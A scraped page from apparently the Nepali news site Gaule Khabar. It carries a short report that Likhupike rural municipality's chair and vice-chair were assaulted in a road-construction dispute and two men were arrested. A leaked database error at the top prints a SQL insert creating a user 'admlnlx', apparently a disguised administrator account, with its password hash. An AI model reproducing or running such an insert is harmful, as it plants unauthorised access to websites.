WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BUUxzxayvLmD8zpZImf9VxlLAo/ryi0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:12:30', '', 'admlnlx', 'admlnlx')

लिखुपिके गाउँपालिकाका जनप्रतिनिधिहरुमाथि हातपात – Gaule Khabar

लिखुपिके गाउँपालिकाका जनप्रतिनिधिहरुमाथि हातपात

  सोलुखुम्बुको लिखुपिके गाउँपालिकाका जनप्रतिनि...

लिखुपिके गाउँपालिकाका जनप्रतिनिधिहरुमाथि हातपात

जेठ ३२, काठमाडौं-  सोलुखुम्बुको लिखुपिके गाउँपालिकाका जनप्रतिनिधिहरुमाथि हातपात भएको छ ।

 

गाउँपालिकाका अध्यक्ष डम्बर बहादुर बस्नेत र उपाध्यक्ष प्रमिला बस्नेत कार्कीमाथि आइतबार वडा नं ४ स्थित सडक निर्माणको विषयमा भएको छलफलमा विवाद हुँदा हातपात गरिएको हिमाल एफएमले जनाएको छ ।

हातपात गरेको आरोपमा स्थानीय ३० बर्षिय सरोज बस्नेत र शुभराम बस्नेतलाई प्रहरीले पक्राउ गरेको छ । उनीहरूलाई जिल्ला प्रहरी कार्यालय सल्लेरी लगिएको प्रहरी निरिक्षक मन्दिप चौहानले जानकारी दिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका